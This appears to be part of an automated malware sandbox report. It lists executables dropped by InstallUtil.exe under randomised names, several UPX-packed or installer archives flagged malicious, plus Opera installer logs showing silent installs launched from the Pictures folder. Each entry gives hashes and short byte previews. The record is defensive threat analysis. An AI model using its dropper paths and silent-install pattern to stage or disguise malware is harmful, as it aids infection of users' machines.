                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\SSEzfyhdmFgId4wuINTHaAmw.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\SgAcco9DZkNoSLENpGeXyqR0.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.76847662210834
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:anSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:ZWqlkLESgCRE/vhOjb05efd6e/oXHA
                                                                                                                                                                                                                                MD5:8CCBA0307EC170E05AC6068B7B000FB6
                                                                                                                                                                                                                                SHA1:6673BFAC81C38F68A717B7FE329FB0548D88E511
                                                                                                                                                                                                                                SHA-256:E3009D8ED74E29D85D2DAD40B1C0CCC2010089A99437790A7400E64F0F829A72
                                                                                                                                                                                                                                SHA-512:26ED579D77A2E93E424CA1395118F4FC2E5E20F5E23899B2CFD6A44496925D77407B42ECD38027AAE03E23AB1871DA889A90970760967C64F52C3D90792E3700
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\SwLW7tCu3MPLSebktZR0Do4H.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\TUgcsAhZj9KS9L7Y6WBtONe5.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\1EkTthwf6man8aNjDkP3iYby.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768477359830509
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:dnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:UWqlkLESgCRE/vhOjb05efd6e/oXHA
                                                                                                                                                                                                                                MD5:AAFB0357588673B1DB5973DFF4616B8F
                                                                                                                                                                                                                                SHA1:8CB74C5AF1A3FDFF9A3B1D85927BEB8BDBFD6140
                                                                                                                                                                                                                                SHA-256:3F759311A90C05A45EC281335DD61FE35CCF4C681B52CC5550B61EB7E8F373D6
                                                                                                                                                                                                                                SHA-512:DD09DC46BFF496516B57F798B1D2975B0115AE2362B29393B1010BCF8767A2772282C58D85B2B9EC3E972E024E635498B51ADB04B184278C7A178F5485F11884
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....7.-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\51fuIpAxuIxVSFNlFyLCdDUf.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.7684793872606654
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:3nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHi:CWqlkLESgCRE/vhOjb05efd6e/oXHi
                                                                                                                                                                                                                                MD5:B4CEF398C7001044330BE058549F9DE3
                                                                                                                                                                                                                                SHA1:9A5D2F59C06849BF7CF80A12E4FEF6FC1605234C
                                                                                                                                                                                                                                SHA-256:568F948A3289967E02C0524A5FEA70BE37B1208C1429B37CED3B316193345FDC
                                                                                                                                                                                                                                SHA-512:E6E27836E2D84DDC14B5DB7090C4C0CCA5FC4988FB3E9E47A27F9E52AD7B349E69E73EFF7B7DEB4472FEA6CF307820950CDE7FA69BB65801B6CFC71561B9F960
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\8aNg0kr81H7icHssfXxzSpJA.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768474290842228
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:4nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHS:7WqlkLESgCRE/vhOjb05efd6e/oXHS
                                                                                                                                                                                                                                MD5:95F97B76DCB43201CEBCFACE99D5C36C
                                                                                                                                                                                                                                SHA1:44B55EE7AADD00158A2BCD4180C96566CB043E3B
                                                                                                                                                                                                                                SHA-256:5E5F06B401B4865D5491BF3CEBD43116F17CBFE71D3884B7674CE5D617338DDC
                                                                                                                                                                                                                                SHA-512:B1800B9F1F928765ED6984874FBA5876C1D80B1CC7F574740F2997E4ECC5F51F826CF38209C201BBBC05A0FCC2C72203F8166783510A05380FE9BA012F86C282
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\MX6OxFuxXLJNkbD9F2dPLyyC.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768477901904957
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:onSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHb:LWqlkLESgCRE/vhOjb05efd6e/oXHb
                                                                                                                                                                                                                                MD5:61ACBBC8CAEF6EB5C8D4CBDE2EEC2312
                                                                                                                                                                                                                                SHA1:CB9220CBC288E6AE86FC37F95F40A08618F24F83
                                                                                                                                                                                                                                SHA-256:5077CF4228786A5C7FDF27D9CB46977F6083663D20AD852C8BCA367C6A73E6BC
                                                                                                                                                                                                                                SHA-512:49970239E8820186EA218FF5B9D61300BE7D7C9C5077DA8E62A8C54A220BCBB51F9EA630321F9D3F97C5E60860878DC2C7B1370E6EB45061C61B420AC5EEC666
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128141\opera_package

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):44505088
                                                                                                                                                                                                                                Entropy (8bit):7.999974845287764
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:786432:LGKQI6b1K2iURSVSRO4ro3zDThekLomyAl5as15mLyxPiWfBeyfgLVoIg9ftDrZB:PQlb1K2VRNro3znhnh15oy4WHfGVu9tD
                                                                                                                                                                                                                                MD5:52B634BD5DD09033FE600A08800600A1
                                                                                                                                                                                                                                SHA1:314950B5396977BC594B9FD345F24E1BBA2562E5
                                                                                                                                                                                                                                SHA-256:2A268AA46C33252FCB5AC8377D4FEB4BA92DD27CC7625FE2F5FB3635BB32302C
                                                                                                                                                                                                                                SHA-512:151834321C0D9B49D1AF0BB7EF8A6653C6A5CDECD615E7142E36BFEAF30A3FFAF6A5E527C68111DF4DC67FA13605964822936F76E98305320FC57A2360CF4ECD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@..........................................................................b...........................)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128321\opera_package

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):36044800
                                                                                                                                                                                                                                Entropy (8bit):7.999963633984123
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:786432:LGKQI6b1K2iURSVSRO4ro3zDThekLomyAl5as15mLyxPiWfBer:PQlb1K2VRNro3znhnh15oy4WQ
                                                                                                                                                                                                                                MD5:33635137DFEC694F752AC199035AA716
                                                                                                                                                                                                                                SHA1:E868B8AEE66592FF4B8E9B16B585A314FCF09280
                                                                                                                                                                                                                                SHA-256:8BBF7790F6AADA2E77F59406B20F831149B0B93B1E3C8AFBF3D2C72CE4A10ED1
                                                                                                                                                                                                                                SHA-512:95688ADCF1DBC41C0F75B8D79D47E14976E679877C3E1803E2C09F8520171EC54EEF1C1AF8F6A9A4164BA297CC56B064E5A2F204C2B6BE1C75AF7464413673C9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@..........................................................................b...........................)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112746972.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3800
                                                                                                                                                                                                                                Entropy (8bit):5.596975378961288
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:BQbqfKpQb5JpQbNpQbd8pQbspQbnpQbipQb5pes3pQb1ncVBYVPtCgqm3cFuqK7A:x5VxtXzFUeEqX5glNX5gl5Nvy
                                                                                                                                                                                                                                MD5:4927591CFF52993E5B32D51B82015F88
                                                                                                                                                                                                                                SHA1:326D970BE1F92FBA165B06EBAA6A69B3C7004012
                                                                                                                                                                                                                                SHA-256:8FC8115D4B103E9DB99D8BE94D9A4E7998B3E25D1151C729C2D1770FC265F93A
                                                                                                                                                                                                                                SHA-512:7EEDF07566E61E5E4DDFE3476070E7DB6C03490AF606AA024C1DB378437E66572FBAAB3406C9ECFF62642E4A90A005405A5C1158734C168C7F6E3B29426B2000
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[0312/112746.972:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/112746.972:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exe" --silent --allusers=0.[0312/112746.972:INFO:installer_main.cc(480)] Uninstall:0.[0312/112746.972:INFO:installer_main.cc(481)] Silent:1.[0312/112746.972:INFO:installer_main.cc(482)] Run Immediately0.[0312/112746.972:INFO:installer_main.cc(484)] Backend0.[0312/112746.972:INFO:installer_main.cc(485)] Inside package0.[0312/112746.972:INFO:installer_main.cc(486)] Autoupdate:0.[0312/112746.972:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/112746.972:INFO:installer_main.cc(636)] Tracking data: MDU1MDRmNzgzZGMyNGY3YmNmM2IwNzk1Y2JjODdjNWY1MTBlZjM5OGZhOTg5MDM3ZTg5NDc3MDg3NjEzZDQ2NTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112756158.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):5276
                                                                                                                                                                                                                                Entropy (8bit):5.537348543141002
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:UqCSdx03hdqUefX5gl22hSX5glTTGX5gl9X5glfNLC:UqC0KxEUI5gI2h+5gly5gf5gNY
                                                                                                                                                                                                                                MD5:947273842B3B7BF387E9735295E2A96C
                                                                                                                                                                                                                                SHA1:3977F8FE54BA9A7231FF0D53166F4EFC7CDF1A82
                                                                                                                                                                                                                                SHA-256:183B54D7ABD20050A1AEE74886F59D22EFB010B3DF9789855CD98985B7E492E4
                                                                                                                                                                                                                                SHA-512:C8C9D4E6AFE0FB4C90347D03E3E81E1FBCF893804F07DE1755A85DA47F55C59BAEE797362099825F7CD435C3E4FA6242F88FADEAE2282DFECEB9B7208FE6C790
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[0312/112756.158:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/112756.158:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exe" --silent --allusers=0.[0312/112756.174:INFO:installer_main.cc(480)] Uninstall:0.[0312/112756.174:INFO:installer_main.cc(481)] Silent:1.[0312/112756.174:INFO:installer_main.cc(482)] Run Immediately0.[0312/112756.174:INFO:installer_main.cc(484)] Backend0.[0312/112756.174:INFO:installer_main.cc(485)] Inside package0.[0312/112756.174:INFO:installer_main.cc(486)] Autoupdate:0.[0312/112756.174:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/112756.174:INFO:installer_main.cc(636)] Tracking data: NDEzYTdhOGVjZmI4MWQ3YmI2NzJlMzYzNmRmNDdkYTk3ZjQ4N2M1ZGU2MGI3ZjcyYWZiODU4ZGUxYzc0OWNjODp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112809817.log

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (521)
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):5314
                                                                                                                                                                                                                                Entropy (8bit):5.526899390180763
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:vZKVFxf5Jmv1HkeVX5glgjXT+X5gl/YfX5gl7X5glBN2S:vZWfJuVk+5gijXTK5gKP5gB5gfMS
                                                                                                                                                                                                                                MD5:6C57F05F06C8FC24B81AA921EE87FE78
                                                                                                                                                                                                                                SHA1:A6D23BA99C01A427A4C393CFCF4FD9D3B92FB68B
                                                                                                                                                                                                                                SHA-256:126F8017E61590CA973FD06610F09EFABEEE1347C2E8B6DBF61E53567918B0CB
                                                                                                                                                                                                                                SHA-512:E8269422A42F14CD8C7D574458508D2EDD848EF7DC40F7A6933E24A2B09C5271588C9B76CA0FF8F9F33AE6CD2EDF44B6D98B86A41C6F21A9C9CEA0A2AA0D0697
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:[0312/112809.817:INFO:installer_main.cc(455)] Opera installer starting - version 108.0.5067.24 Stable.[0312/112809.817:INFO:installer_main.cc(458)] Command line: "C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exe" --silent --allusers=0.[0312/112809.817:INFO:installer_main.cc(480)] Uninstall:0.[0312/112809.817:INFO:installer_main.cc(481)] Silent:1.[0312/112809.817:INFO:installer_main.cc(482)] Run Immediately0.[0312/112809.817:INFO:installer_main.cc(484)] Backend0.[0312/112809.817:INFO:installer_main.cc(485)] Inside package0.[0312/112809.817:INFO:installer_main.cc(486)] Autoupdate:0.[0312/112809.833:INFO:payload_manager_impl.cc(97)] Reading Payload.[0312/112809.833:INFO:installer_main.cc(636)] Tracking data: YWZkYzM0ZWUxYWVjZWViYWZmZmQxNDk4OWM2Yjk4ZDU2NDY5OGNlNGYxOGMwZWViMjQ5MDZhN2FkODA1OThlNTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N

